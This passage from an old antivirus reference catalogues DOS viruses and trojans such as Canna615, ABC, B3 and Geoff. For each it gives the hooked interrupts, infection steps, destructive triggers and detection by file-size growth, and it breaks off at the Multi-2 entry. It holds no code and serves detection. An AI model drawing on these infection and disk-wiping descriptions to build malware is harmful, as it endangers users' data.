  4558. Note: The PCBB virus hooks INT 24h when
  4559.       infecting files.  It omits I/O  errors
  4560.       (such as write protect).
  4561.  
  4562. [Canna615]
  4563. Virus Name: CANNA615
  4564. Virus Type:  Highest Memory Resident, File
  4565.              Infector Virus
  4566.              (infects .COM & .EXE files).
  4567. Virus Length:  1568 Bytes (COM & EXE)
  4568. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4569.                    program), INT 24h
  4570. Infecting Procedure:
  4571. 1) The virus checks whether it is already loaded
  4572.    resident in memory. If "No", it then loads
  4573.    itself into resident memory by hooking INT
  4574.    21h.
  4575. 2) It then checks whether system date is Friday,
  4576.    and the seconds of  the system time is zero,
  4577.    if "Yes", then a message and a picture
  4578.    appear on the screen: "LEGALIZE CANNA615" and
  4579.    a   picture of a hemp leaf.
  4580. 3) It then executes the original file.
  4581. 4) With itself loaded into resident memory it
  4582.    will infect any uninfected file that is
  4583.    executed.
  4584. Damage:   None.
  4585. Detecting Method:  Infected files increase by
  4586.                    1568 Bytes.
  4587. Note: The Canna615 virus hooks INT 24h when
  4588.       infecting files. It omits I/O error (such as
  4589.       write protect).
  4590.  
  4591. [Magnum]
  4592. Virus Name: MAGNUM
  4593. Virus Type: Memory Resident, File Infector
  4594.             Virus (infects .COM & .EXE files).
  4595. Virus Length:  2560 Bytes (COM & EXE)
  4596. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4597.                    program), INT 24h, INT 8h
  4598. Infecting Procedure:
  4599. 1) The virus checks whether it is already loaded
  4600.    resident in memory. If "No", it then loads
  4601.    itself into resident memory by hooking INT
  4602.    21h.
  4603. 2) It then executes the original file.
  4604. 3) With itself loaded into resident memory it will
  4605.    infect any uninfected file that is executed.
  4606. Damage:   None.
  4607. Detecting Method: Infected files increase by
  4608.                   2560 Bytes.
  4609. Note:
  4610. 1) The Magnum virus hooks INT 24h when
  4611.    infecting files. It omits I/O errors (such as
  4612.    write protect).
  4613. 2)The virus only runs under DOS 3.3
  4614.  
  4615. [Lycee]
  4616. Virus Name: LYCEE
  4617. Virus Type: Memory Resident, File Infector
  4618.             Virus (infects .COM & .EXE files).
  4619. Virus Length:  1788 Bytes (COM & EXE)
  4620. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4621.                    program), INT 24h, INT 8h,
  4622.                    INT 9h
  4623. Executing Procedure:
  4624. 1) Checks whether it resides in memory.  If not,
  4625.    hooks INT 21h, INT 8h and INT 9h, installs
  4626.    itself as memory resident, and then executes
  4627.    the host program.
  4628. 2) If the virus already resides in memory, it
  4629.    will proceed to execute the host program
  4630.    directly.
  4631. Infecting Procedure:
  4632. 1) The virus Infects files by AH=4B in INT 21h.
  4633.    When an uninfected program is executed, it will
  4634.    get infected.
  4635. 2) Lycee will hook INT 24h before infecting files
  4636.    to ignore I/O errors.
  4637. Damage: If you haven't pressed any key for some
  4638.         minutes, a small window will appear on the
  4639.         screen until you press a key.
  4640. Detecting Method:
  4641. 1) Infected files increase by 1788 Bytes.
  4642. Note: The Lycee virus hooks INT 24h when infecting
  4643.       files. It omits I/O   errors (such as write
  4644.       protect).
  4645. Remarks: The virus does timing by INT 8h.  When
  4646.          the keyboard is not hit for a certain
  4647.          period of time, the virus will open a
  4648.          small window on the screen until a key is
  4649.          pressed.
  4650.  
  4651. [Brain2]
  4652. Virus Name: BRAIN2
  4653. Virus Type: Memory Resident, File Infector
  4654.             Virus (infects .COM & .EXE files).
  4655. Virus Length:  1935 Bytes (COM & EXE)
  4656. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4657.                    program), INT 24h, INT 1Ch
  4658. Infecting Procedure:
  4659. 1) It checks whether the system date is the
  4660.    17th of November or the 6th of February,  if
  4661.    "Yes", it will show some messages and play
  4662.    music.
  4663. 2) The virus then checks whether it  is already
  4664.    loaded resident in memory. If "No", it then
  4665.    loads itself into resident memory by hooking
  4666.    INT 21h.
  4667. 3) It then executes the original file.
  4668. 4) It then checks whether the system date is the
  4669.    1st of  February, July, September or December,
  4670.    If "yes", the virus will show a flash square
  4671.    by hooking INT 1Ch.
  4672. 5) With itself loaded into resident memory it
  4673.    will infect any uninfected file that is
  4674.    executed.
  4675. Damage:   None.
  4676. Detecting Method:   Infected files increase by
  4677.                     1935 Bytes.
  4678. Note: The Brain2 virus hooks INT 24h when
  4679.       infecting files. It omits I/O errors
  4680.       (such as write protect).
  4681.  
  4682. [Antiprnt]
  4683. Virus Name: ANTIPRNT
  4684. Virus Type:  Highest Memory Resident, File
  4685.              Infector Virus (infects .EXE files).
  4686. Virus Length:  593 Bytes (EXE)
  4687. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4688.                    program), INT 24h
  4689. Infecting Procedure:
  4690. 1)  The virus checks whether it is already loaded
  4691.     resident in memory.  If "No", it then loads
  4692.     itself into resident memory (highest memory)
  4693.     by hooking INT 21h.
  4694. 2) It then executes the original  file.
  4695. 3) With itself loaded into resident memory it will
  4696.    infect any uninfected file that is executed.
  4697. Damage: If the DOS Version is later than 3.0, and
  4698.         "PRINTER" is installed, then the virus
  4699.         will destroy data on the current disk.
  4700. Detecting Method:
  4701. 1) Infected files increase by 593 Bytes.
  4702. Note: The ANTIPRNT virus hooks INT 24h when
  4703.       infecting files. It omits I/O errors
  4704.       (such as write protect).
  4705.  
  4706. [ABC]
  4707. Virus Name: ABC
  4708. Virus Type:  Highest Memory Resident, File
  4709.              Infector Virus (infects .EXE files).
  4710. Virus Length:  2912 Bytes (EXE)
  4711. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4712.                    program), INT 24h, INT 1Ch,
  4713.                    INT 16h
  4714. Infecting Procedure:
  4715. 1) The virus checks whether it is already loaded
  4716.    resident in memory. If "No", it then loads
  4717.    itself resident in memory (highest memory) by
  4718.    hooking INT 21h, INT 1Ch, INT 16h.
  4719. 2) It then executes the original file.
  4720. 3) With itself loaded into resident memory it will
  4721.    infect any uninfected file that is executed.
  4722.    b) Doesn't  infect COM files and EXE files with
  4723.    a length shorter than 20K.
  4724. Damage: When the system date is on the 14th, and
  4725.         the virus has been in memory  for 55
  4726.         minutes, then it will destroy the data on
  4727.         the hard disk.
  4728. Detecting Method:  Infected files increase by
  4729.                    2912 Bytes.
  4730. Note: The ABC virus hooks INT 24h when
  4731.       infecting files. It omits I/O errors (such
  4732.       as write protect).
  4733.  
  4734. [CivilWar]
  4735. Virus Name: Civilwar
  4736. Virus Type:  Highest Memory Resident, File
  4737.              Infector Virus (infects .COM files).
  4738. Virus Length:  599 Bytes (COM)
  4739. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4740.                    program), INT 24h
  4741. Executing Procedure:
  4742. 1)  The virus checks whether it is already loaded
  4743.     resident in memory. If "No", it then loads
  4744.     itself into resident memory (highest memory)
  4745.     by hooking INT 21h.
  4746. 2) It then executes the original file.
  4747. 3) With itself loaded into resident memory it
  4748.    will infect any uninfected file that is executed.
  4749.    b) It doesn't infect .EXE files.
  4750. Damage:   None.
  4751. Detecting Method:  Infected files increase by
  4752.                    599 Bytes.
  4753. Note: The Civilwar virus  hooks INT 24h when
  4754.       infecting files. It omits I/O errors (such
  4755.       as write protect).
  4756.  
  4757. [Leech]
  4758. Virus Name: Leech
  4759. Virus Type:  Highest Memory Resident, File
  4760.              Infector Virus (infects .COM files).
  4761. Virus Length:  1024 Bytes (COM)
  4762. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4763.                    program), INT 24h
  4764. Executing Procedure:
  4765. 1) The virus checks whether it is already loaded
  4766.    resident in memory. If "No", it then loads
  4767.    itself into resident memory by hooking INT
  4768.    21h.
  4769. 2) It then executes the original file.
  4770. 3) With itself loaded into resident memory it will
  4771.    infect any uninfected file that is executed.
  4772.    b) It doesn't infect .EXE files.
  4773. Damage:   None.
  4774. Detecting Method:  Infected files increase by
  4775.                    1024 Bytes.
  4776. Note: The Leech virus hooks INT 24h when
  4777.       infecting files. It omits I/O errors
  4778.       (such as write protect).
  4779.  
  4780. [302]
  4781. Virus Name: 302
  4782. Virus Type:  Highest Memory Resident, File
  4783.              Infector Virus (infects .COM files).
  4784. Virus Length:  302 Bytes (COM)
  4785. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4786.                    program), INT 24h
  4787. Executing Procedure:
  4788. 1)  The virus checks whether it is already loaded
  4789.     resident in memory. If "No", it then loads
  4790.     itself into resident memory by hooking INT
  4791.     21h.
  4792. 2) It then executes the original file.
  4793. 3) With itself loaded into resident memory it will
  4794.    infect any uninfected file that is executed.
  4795.    b) It doesn't infect .EXE files .
  4796. Damage:   None.
  4797. Detecting Method:   Infected files increase by
  4798.                     302 Bytes.
  4799. Note: The 302 virus hooks INT 24h when infecting
  4800.       files.  It omits I/O errors (such as write
  4801.       protect).
  4802.  
  4803. [Little_Brother]
  4804. Virus Name: Little_Brother
  4805. Virus Type:  Memory Resident, File Infector
  4806.              Virus (Companion Virus).
  4807. Virus Length:  250 Bytes (EXE)
  4808. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4809.                    program), INT 24h
  4810. Executing Procedure:
  4811. 1) The virus checks whether it is already loaded
  4812.    resident in memory. If "No", it then loads
  4813.    itself into resident memory by hooking INT
  4814.    21h.
  4815. 2) It then executes the original file.
  4816. 3) With itself loaded into resident memory it
  4817.    will infect any uninfected file that is
  4818.    executed.  b) It doesn't infect .COM files.
  4819. Damage: When an uninfected file is executed, the
  4820.         virus will create a *.COM file with the
  4821.         same   name as *.EXE file ( example: run
  4822.         "AAA.EXE", "AAA.COM" will be created by
  4823.         Little_Brother).
  4824. Detecting Method:   Infected files increase by
  4825.                     250 Bytes.
  4826. Note: The Little_Brother virus  hooks INT 24h
  4827.       when infecting files.  It omits I/O errors
  4828.       (such as write protect).
  4829.  
  4830. [ARCV-9]
  4831. Virus Name: ARCV-9
  4832. Virus Type:  Highest Memory Resident, File
  4833.              Infector Virus (infects .COM files).
  4834. Virus Length:  771 Bytes (COM)
  4835. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4836.                    program), INT 24h
  4837. Executing Procedure:
  4838. 1)  The virus checks whether it is already loaded
  4839.     resident in memory. If "No", it then loads
  4840.     itself into resident memory by hooking INT
  4841.     21h.
  4842. 2) It then executes the original file.
  4843. 3) With itself loaded into resident memory it will
  4844.    infect any uninfected file that is executed.
  4845.    b) It doesn't infect .EXE files.
  4846. Damage:   None.
  4847. Detecting Method:
  4848. 1) Infected files increase by 771 Bytes.
  4849. Note: The ARCV-9 virus hooks INT 24h when
  4850.       infecting files. It omits I/O errors
  4851.       (such as write protect).
  4852.  
  4853. [NG-914]
  4854. Virus Name: NG-914
  4855. Virus Type:  Memory Resident, File Infector
  4856.              Virus (infects .COM files).
  4857. Virus Length:  914 Bytes (COM)
  4858. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4859.                    program), INT 24h
  4860. Executing Procedure:
  4861. 1) The virus checks whether it is already loaded
  4862.    resident in memory. If "No", it then loads
  4863.    itself into resident memory by hooking INT
  4864.    21h.
  4865. 2) It then executes the original file.
  4866. 3) With itself loaded into resident memory it
  4867.    will infect any uninfected file that is
  4868.    executed.  b) It doesn't infect .EXE files.
  4869. Damage:   None.
  4870. Detecting Method:   Infected files increase by
  4871.                     914 Bytes.
  4872. Note: The NG-914 virus hooks INT 24h when
  4873.       infecting files.  It omits I/O errors
  4874.       (such as write protect).
  4875.  
  4876. [Civil510]
  4877. Virus Name: Civil510
  4878. Virus Type:  Highest Memory Resident, File
  4879.              Infector Virus (infects .COM files).
  4880. Virus Length:  2080 Bytes (COM)
  4881. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4882.                    program), INT 24h
  4883. Executing Procedure:
  4884. 1) The virus checks whether it is already loaded
  4885.    resident in memory. If "No", it then loads
  4886.    itself into resident memory by hooking INT
  4887.    21h.
  4888. 2) It then executes the original file.
  4889. 3) With itself loaded into resident memory it will
  4890.    infect any uninfected file that is executed.
  4891.    b) It doesn't infect .EXE files.
  4892. Damage:   None.
  4893. Detecting Method:  Infected files increase by
  4894.                    2080 Bytes.
  4895. Note: The Civil510 virus hooks INT 24h when
  4896.       infecting files. It omits I/O errors (such
  4897.       as write protect).
  4898.  
  4899. [B3]
  4900. Virus Name: B3
  4901. Virus Type:  Memory Resident, File Infector
  4902.              Virus (infects .COM files).
  4903. Virus Length:  483 Bytes (COM)
  4904. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4905.                    program), INT 24h
  4906. Executing Procedure:
  4907. 1) The virus checks whether the system date is
  4908.    the 26th of  June, if "Yes", then it will
  4909.    destroy all data on the hard disk, if  "No",
  4910.    the virus checks whether it is already loaded
  4911.    resident in memory. If "No", it then loads
  4912.    itself into resident memory by hooking INT
  4913.    21h.
  4914. 2) It then executes the original file.
  4915. 3) With itself loaded into resident memory it will
  4916.    infect any uninfected file that is executed.
  4917.    b) It doesn't infect .EXE files.
  4918. Damage: If the system date is the 26th of June,
  4919.         then the virus will destroy all data on
  4920.         the hard disk..
  4921. Detecting Method:  Infected files increase by
  4922.                    483 Bytes.
  4923. Note: The B3 virus hooks INT 24h when infecting
  4924.       files. It omits I/O errors (such as write
  4925.       protect).
  4926.  
  4927. [RKO-1]
  4928. Virus Name: RKO-1
  4929. Virus Type:  Memory Resident, File Infector
  4930.              Virus
  4931. Virus Length:  None.
  4932. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4933.                    program), INT 24h
  4934. Executing Procedure:
  4935. 1) The virus checks whether the system date is
  4936.    the 13th, if "Yes", it destroys all data on
  4937.    the hard disk, if "No", the virus checks
  4938.    whether it is already loaded resident in
  4939.    memory. If  "No", it then loads itself into
  4940.    resident memory by hooking INT 21h.
  4941. 2) It then executes the original file.
  4942. 3) With itself loaded into resident memory it will
  4943.    infect any uninfected file that is executed or
  4944.    when INT    21h is called by AX=11h  or AX=12h.
  4945. Damage: If system date is the 13th, then the virus
  4946.         will destroy all data on the hard disk..
  4947. Detecting Method:  None.
  4948. Note: The RKO-1 virus hooks INT 24h when infecting
  4949.       files. It omits I/O errors   (such as write
  4950.       protect).
  4951.  
  4952. [Dame]
  4953. Virus Name: Dame
  4954. Virus Type:  Memory Resident, File Infector
  4955.              Virus (Mutation Engine).
  4956. Virus Length:  None.
  4957. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4958.                    program), INT 24h
  4959. Executing Procedure:
  4960. 1) The virus checks whether it is already loaded
  4961.    resident in memory. If "No", it then loads
  4962.    itself into resident memory by hooking INT 21h.
  4963. 2) It then executes the original file.
  4964. 3) With itself loaded into resident memory it will
  4965.    infect any uninfected file that is executed.
  4966. 4) After it has infected files, it will check the
  4967.    time. If the time is between 12:00 A.M. and
  4968.    12:30 A.M., it will show the message: "Don't
  4969.    worry, you are not alone at this hour.... This
  4970.    Virus is NOT dedicated to Sara. It's dedicated
  4971.    to her Groove (...That s my name).. This Virus
  4972.    is only a test therefor ..  be ready for my
  4973.    Next Test...".
  4974. Damage:   None.
  4975. Detecting Method:  None.
  4976. Note:
  4977. 1) The Dame virus hooks  INT 24h when infecting
  4978.    files.  It omits I/O errors (such as write
  4979.    protect).
  4980. 2) The virus will encode itself, before it infects
  4981.    files. And the method of encoding depends on
  4982.    time. So it will be different in every file.
  4983.  
  4984. [7thson]
  4985. Virus Name: 7thson
  4986. Virus Type:   Memory Resident, File Infector
  4987.               Virus (Companion).
  4988. Virus Length:  321 or 307 Bytes (EXE)
  4989. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4990.                    program), INT 24h
  4991. Executing Procedure:
  4992. 1) The virus checks whether it is already loaded
  4993.    resident in memory. If "No", it then loads
  4994.    itself into resident memory by hooking INT
  4995.    21h.
  4996. 2) It then executes the original file.
  4997. 3) With itself loaded into resident memory it
  4998.    will infect any uninfected file that is
  4999.    executed.  b) It doesn't infect .COM files.
  5000. Damage: When you run an .EXE file, the virus
  5001.         will create a new .COM file with  the same
  5002.         name as .EXE file and the length equals to
  5003.         321 or 307 Bytes.
  5004. Detecting Method: Check whether there are some COM
  5005.                   files with length equal to 321
  5006.                   or 307 Bytes.
  5007. Note: The 7thson virus hooks INT 24h and closes
  5008.       the "control_break" command when infecting
  5009.       files. It omits I/O errors (such as write
  5010.       protect).
  5011.  
  5012. [Geoff]
  5013. Virus Name: Geoff
  5014. Virus Type:  Trojan
  5015. Virus Length:  5952 Bytes
  5016. PC Vectors Hooked: INT 24h
  5017. Executing Procedure:
  5018. 1) Doesn't infect any file or partition or boot
  5019.    sector.
  5020. 2) Before destruction, it shows the message:"
  5021.    Search And Destroy Loading v1.0 Bringing The
  5022.    Best And Latest Warex....... Press [ENTER] to
  5023.    Start The Game."
  5024. 3) It then destroys all data of all disks if
  5025.    drives are ready.
  5026. 4) After destroying , it shows the message:" Hey
  5027.    Geoff You know what happened a few days ago?
  5028.    Some friend asked me to get rid of you,........
  5029.    P.S. I have nothing personal against you! You
  5030.    just FUCKED with the Cold Brother and I had to
  5031.    take you down, again".
  5032. Damage: Destroys all data on all disks if drives
  5033.         are ready.
  5034. Detecting Method:
  5035. 1) Check whether there are files with length is
  5036.    5952 Bytes.
  5037. Note:
  5038. 1) Doesn't stay resident in memory.
  5039. 2) Geoff hooks INT 24h when destroying. It omits
  5040.    I/O errors (such as write protect).
  5041.  
  5042. [CMOSKill]
  5043. Virus Name: Cmoskill
  5044. Virus Type: Trojan
  5045. Virus Length: 29 Bytes
  5046. PC Vectors Hooked: None
  5047. Damage:  Deletes all the  "CMOS" data.
  5048. Detecting Method:  None.
  5049. Note:
  5050. 1) Doesn't stay resident in memory.
  5051. 2) Doesn't infect any files or partition or boot
  5052.    sector.
  5053.  
  5054. [Killboot]
  5055. Virus Name: Killboot
  5056. Virus Type: Trojan
  5057. Virus Length: 32000 Bytes
  5058. PC Vectors Hooked: None
  5059. Damage:  Destroys all data in the BOOT SECTOR of
  5060.          "C:\" and "B:\", then shows a line of
  5061.          codes and the system halts.
  5062. Detecting Method:  None.
  5063. Note:
  5064. 1) Doesn't stay resident in memory.
  5065. 2) Doesn't infect any files or partition.
  5066.  
  5067. [NUKEX]
  5068. Virus Name: NUKEX
  5069. Virus Type: Trojan
  5070. Virus Length: 469 Bytes
  5071. PC Vectors Hooked: None
  5072. Damage:  Deletes all files on hard disk
  5073.          ( include all subdirectories).
  5074. Detecting Method:  None.
  5075. Note:
  5076. 1) Doesn't stay resident in memory.
  5077. 2) Doesn't infect any files  or partition or boot
  5078.    sector.
  5079.  
  5080. [Fire]
  5081. Virus Name: Fire
  5082. Virus Type: Trojan
  5083. Virus Length: 4304 Bytes
  5084. PC Vectors Hooked: INT 24h
  5085. Damage:  Destroys all data on all disks if
  5086.          drives are ready, then it makes a sound.
  5087. Detecting Method:  Check whether there are files
  5088.                    with 4304 Bytes.
  5089. Note:
  5090. 1) Doesn't stay resident in memory.
  5091. 2) Doesn't infect any files  or partition or boot
  5092.    sector.
  5093. 3) The Fire virus  hooks INT 24h when destroying,
  5094.    it omits I/O errors ( such as write protect).
  5095.  
  5096. [Secto]
  5097. Virus Name: Secto
  5098. Virus Type: Trojan
  5099. Virus Length: 487 Bytes
  5100. PC Vectors Hooked: None
  5101. Damage:  Destroy data on boot sector of
  5102.          "A:\".
  5103. Detecting Method:  None.
  5104. Note:
  5105. 1) Doesn't stay resident in memory.
  5106. 2) Doesn't infect any files or partition.
  5107. 3) Doesn't hook INT 24h when destroying,  An error
  5108.    message occurs if there is I/O errors (such as
  5109.    write protect).
  5110.  
  5111. [MSK]
  5112. Virus Name: MSK
  5113. Virus Type: Trojan
  5114. Virus Length: 272 Bytes
  5115. PC Vectors Hooked: None
  5116. Damage:  Destroys all data on hard disk.
  5117. Detecting Method:  Check whether there are files
  5118.                    with 272 Bytes.
  5119. Note:
  5120. 1) Doesn't stay resident in memory.
  5121. 2) Doesn't infect any files or partition or boot
  5122.    sector.
  5123.  
  5124. [Dropper]
  5125. Virus Name: Dropper
  5126. Virus Type: Trojan
  5127. Virus Length: 3103 Bytes
  5128. PC Vectors Hooked: None
  5129. Damage:  Deletes all files on disks.
  5130. Detecting Method:  Check whether there are files
  5131.                    with 3103 Bytes.
  5132. Note:
  5133. 1) Doesn't stay resident in memory.
  5134. 2) Doesn't infect any files or partition or boot
  5135.    sector.
  5136. 3) Dropper doesn't hook INT 24h when destroying.
  5137.    An error message occurs if there is an I/O
  5138.    error ( such  as write protect).
  5139.  
  5140. [RNA#1]
  5141. Virus Name: RNA#1
  5142. Virus Type: File Infector Virus (infects .COM &
  5143.            .EXE files)
  5144. Virus Length: 7296 Bytes(COM & EXE)
  5145. PC Vectors Hooked: INT 24h
  5146. Executing Procedure:
  5147. 1) Searches for COM & EXE files on the "C:\
  5148.    drive".
  5149. 2) If found, it then deletes them ( deletes four
  5150.    files at one time)
  5151. 3) When the files are deleted, the virus will
  5152.    create a file named "ZSQA.TH" on disk "C:\".
  5153. Damage: It will delete files of "C:\drive".
  5154. Detecting Method:  Infected files will increase
  5155.                    by 7296 Bytes.
  5156. Note:
  5157. 1) Doesn't stay resident in memory.
  5158. 2) The RNA#1 hooks INT 24h when infecting files.
  5159.    It omits I/O errors (such as write protect).
  5160.  
  5161. [RNA#2]
  5162. Virus Name: RNA#2
  5163. Virus Type: File Infector Virus (infects .COM &
  5164.             .EXE files)
  5165. Virus Length: 7408 Bytes(COM & EXE)
  5166.               PC Vectors Hooked: None
  5167. Executing Procedure:
  5168. 1) Searches for COM & EXE files on "C:\drive".
  5169. 2) If any file are found, the virus will infect
  5170.    them (it infects only four files at one time).
  5171. Damage:  None.
  5172. Detecting Method: Infected files will increase
  5173.                   by 7408 Bytes.
  5174. Note:
  5175. 1) Doesn't stay resident in memory.
  5176. 2) RNA#2 doesn't hook INT 24h when infecting
  5177.    files. It omits I/O errors (such as write
  5178.    protect).
  5179.  
  5180. [Medical]
  5181. Virus Name: Medical
  5182. Virus Type: File Infector Virus (infects .COM
  5183.             files)
  5184. Virus Length: 189 Bytes(COM)
  5185. PC Vectors Hooked: None
  5186. Executing Procedure:
  5187. 1) Searches for a .COM file in the current
  5188.    directory.
  5189. 2) It checks whether it has been infected by
  5190.    Medical, if "Yes", it continues to look for
  5191.    another .COM file.
  5192. 3) It infects only one file at a time.
  5193. Damage:  None.
  5194. Detecting Method:  Infected files will increase
  5195.                    by 189 Bytes.
  5196. Note: Doesn't stay resident in memory.
  5197.       Medical doesn't hook INT 24h when infecting
  5198.       files. It omits I/O errors (such as write
  5199.       protect).
  5200.  
  5201. [Bob]
  5202. Virus Name: Bob
  5203. Virus Type: File Infector Virus (infects .COM
  5204.             files)
  5205. Virus Length: 1117 Bytes(COM)
  5206. PC Vectors Hooked: INT 8h
  5207. Executing Procedure:
  5208. 1) Searches for a .COM file in the current
  5209.    directory.
  5210. 2) It checks whether it has been infected by Bob.
  5211.    If "Yes", it continues to look for an
  5212.    uninfected .COM file.
  5213. 3) It infects only three files at a time.
  5214. 4) It then checks whether the system date is the
  5215.    7th of  September, if "Yes", the virus will
  5216.    hook INT 8h, and about 5 minutes later, one of
  5217.    such messages are displayed on the screen:
  5218.    "1 Bob Ross lives! 2 Bob Ross is watching!
  5219.     3 Maybe he lives here....." and so on.
  5220. Damage: If it is  September 7th, then a message
  5221.         will appear on  the screen.
  5222. Detecting Method:  Infected files will increase
  5223.                    by 1117 Bytes.
  5224. Note:
  5225. 1) Doesn't stay resident in memory.
  5226. 2) Bob doesn't hook INT 24h when infecting files.
  5227.    It omits I/O errors (such as write protect).
  5228.  
  5229. [Cannabis]
  5230. Virus Name: Cannabis
  5231. Virus Type: Floppy Boot Infector
  5232. Virus Length: None.
  5233. PC Vectors Hooked: INT 13h
  5234. Executing Procedure:
  5235. 1) When the system is booted from an infected
  5236.    disk, there will be a 1K decrease in
  5237.    total system memory.
  5238. 2) It then hooks  INT 13h.
  5239. 3) So when you switch on the computer normally,
  5240.    the diskette will be infected by hooking INT
  5241.    13h.
  5242. Damage:  None.
  5243. Detecting Method:  Decreased total memory size
  5244.                    for 1K Bytes.
  5245. Note:
  5246. 1) Cannabis doesn't hook INT 24h when infecting
  5247.    files. It omits I/O errors (such as write
  5248.    protect).
  5249.  
  5250. [Daisy]
  5251. Virus Name: Daisy
  5252. Virus Type:  File Infector Virus (infects .EXE
  5253.              files)
  5254. Virus Length: No change.
  5255. PC Vectors Hooked: None
  5256. Executing Procedure:
  5257. 1) Displays a smilie face and a message on the
  5258.    screen: "Hi, I'm Crazy Daisy!...   I'll format
  5259.    your HARD DISK! ... Say goodbye to your files!"
  5260. 2) The virus then searches for an .EXE file in
  5261.    "A:\drive".
  5262. 3) It  checks whether it has been infected by
  5263.    Daisy before. If "Yes", it continues to look
  5264.    for another uninfected .EXE file.
  5265. 4) It infects all the .EXE files on the A:\drive.
  5266. 5) Then the system halts.
  5267. Damage:
  5268. 1) When all of the .EXE files on the "A:\drive "
  5269.    have been infected, the system halts.
  5270. 2) Overwrites original files, so the length of
  5271.    infected files won't increase.
  5272. 3) When an infected file is executed, it randomly
  5273.    displays one of the following messages:
  5274.    "1. Pretty day today - isn't it?
  5275.     2. Don't worry - sing a song!
  5276.     3. Life isn't easy!
  5277.     4. Don't halt your computer! Let's be
  5278.        friends!
  5279. Detecting Method:  None.
  5280. Note:
  5281. 1) Doesn't stay resident in memory.
  5282. 2) Daisy doesn't hook INT 24h when infecting
  5283.    files. It omits I/O errors (such as write
  5284.    protect).
  5285.  
  5286. [Son of PSMPC]
  5287. Virus Name: SON_OF_PSMPC
  5288. Virus Type:  Virus Generator
  5289. Virus Length: 17741 Bytes.
  5290. PC Vectors Hooked: None
  5291. Executing Procedure:
  5292. 1) This is a "virus generator", when you execute
  5293.    "PC-MPC A.CFG B.CFG..., then A.ASM B.ASM...,
  5294.    are generated, these will be viruses after
  5295.    compiling and linking.
  5296. Detecting Method:  None.
  5297. Note:
  5298. 1) Doesn't stay resident in memory.
  5299. 2) SON_OF_PSMPC doesn't hook INT 24h when
  5300.    infecting files.  It omits I/O errors (such as
  5301.    write protect).
  5302. 3) These generated files can have different
  5303.    functions such as encoding or infecting the
  5304.    "COMMAND.COM" file.
  5305.  
  5306. [Ear]
  5307. Virus Name: EAR
  5308. Virus Type: File Infector Virus (infects .COM &
  5309.            .EXE files)
  5310. Virus Length: 1024 Bytes.
  5311. PC Vectors Hooked: None
  5312. Executing Procedure:
  5313. 1) The virus searches for an .EXE or .COM file in
  5314.    the current directory.
  5315. 2) It checks whether it has been infected by EAR.
  5316.    If "Yes", it continues to look for an
  5317.    uninfected .COM or .EXE file.  3) It continues
  5318.    infecting all COM & EXE files in  the current
  5319.    and the "mother" directories until they have
  5320.    all been infected..
  5321. 4) It then checks whether the system date is 1st
  5322.    day of the month, if "Yes", a message appears
  5323.    on the screen: " PHALON/SKISM 1992 [Ear-6]
  5324.    Alert! Where is the Auditory Canal located?
  5325.    1. External Ear   2. Middle Ear 3. Inner Ear
  5326.    ", then   wait for your choice.
  5327. 5) If you press "1" or "3", you get the following
  5328.    message: " Wow, you own your ears! Please
  5329.    resume work.", then it executes the original
  5330.    file.
  5331. 6) If you press "2" the following message appears:
  5332.    "You obviously no nothing about ears. Try
  5333.    again after some study.", then the program ends
  5334.    and doesn't execute the original file).
  5335. Damage: If system is 1st day of the month, a
  5336.         message will appear on the screen.
  5337. Detecting Method:  Infected files will increase
  5338.                    1024 Bytes.
  5339. Note:
  5340. 1) Doesn't stay resident in memory.
  5341. 2) EAR doesn't hook INT 24h when infecting files.
  5342.    It omits I/O errors (such as write protect).
  5343.  
  5344. [Dir2-910]
  5345. Virus Name: DIR2-910
  5346. Virus Type: File Infector Virus (infects .COM &
  5347.             .EXE files)
  5348. Virus Length: 1024 Bytes
  5349. PC Vectors Hooked: None
  5350. Executing Procedure:
  5351. 1) When the virus loads itself resident in memory
  5352.    it will change the directory structure data, so
  5353.    that certain executable files are linked to
  5354.    itself.
  5355. 2) This makes it so that when you execute a file
  5356.    that the DIR2-910 virus has  linked to it also
  5357.    is executed. At this point it can begin to
  5358.    infect other files.
  5359. 3) The virus stays resident in memory but doesn't
  5360.    hook any interrupts. It uses another function
  5361.    to infect files.  It infects .COM &.EXE files
  5362.    when they are "READ & WRITE".
  5363. Damage:  When all the .COM & .EXE files been
  5364.          infected on a disk, then it will not be
  5365.          possible to execute any files from the
  5366.          disk.
  5367. Detecting Method:
  5368. Check the disk by using "CHKDSK.EXE", if some
  5369. files are crossed -- linked to the same position,
  5370. then these files must be infected.
  5371. Note: DIR2-910 doesn't hook INT 24h when infecting
  5372.       files. It omits I/O errors (such as write
  5373.       protect).
  5374.  
  5375. [INOK-2372]
  5376. Virus Name: INOK-2372
  5377. Virus Type: File Infector Virus (infects .COM
  5378.             files)
  5379. Virus Length: 2372 Bytes.
  5380. PC Vectors Hooked: None
  5381. Executing Procedure:
  5382. 1) When the virus is executed , the following
  5383.    two functions are selected at random.
  5384.    a) It searches for a .COM file in the current
  5385.       directory. Then it checks whether it has
  5386.       been infected  by INOK- 2372. If "Yes",
  5387.       it continues to look for another uninfected
  5388.       .COM file. It only infects one file at a
  5389.       time. Then it executes the original file.
  5390.    b) Creates a file name "ICONKIN.COM" in the
  5391.       current directory, then it executes the file.
  5392.       When the file is executed, a  window appears
  5393.       on the screen until you press a key, and
  5394.       after a while the window appears again.
  5395. Damage:  None.
  5396. Detecting Method:
  5397. 1) Infected files will increase 2372 Bytes.
  5398. 2) If a window appears.
  5399. Note:
  5400. 1) Doesn't stay resident in memory.
  5401. 2) INOK-2372 doesn't hook INT 24h when infecting
  5402.    files. It omits I/O errors (such as write
  5403.    protect).
  5404.  
  5405. [Multi-2]
  5406. Virus Name: Multi-2
  5407. Virus Type: Partition table Infector and File
  5408.             Infector Virus
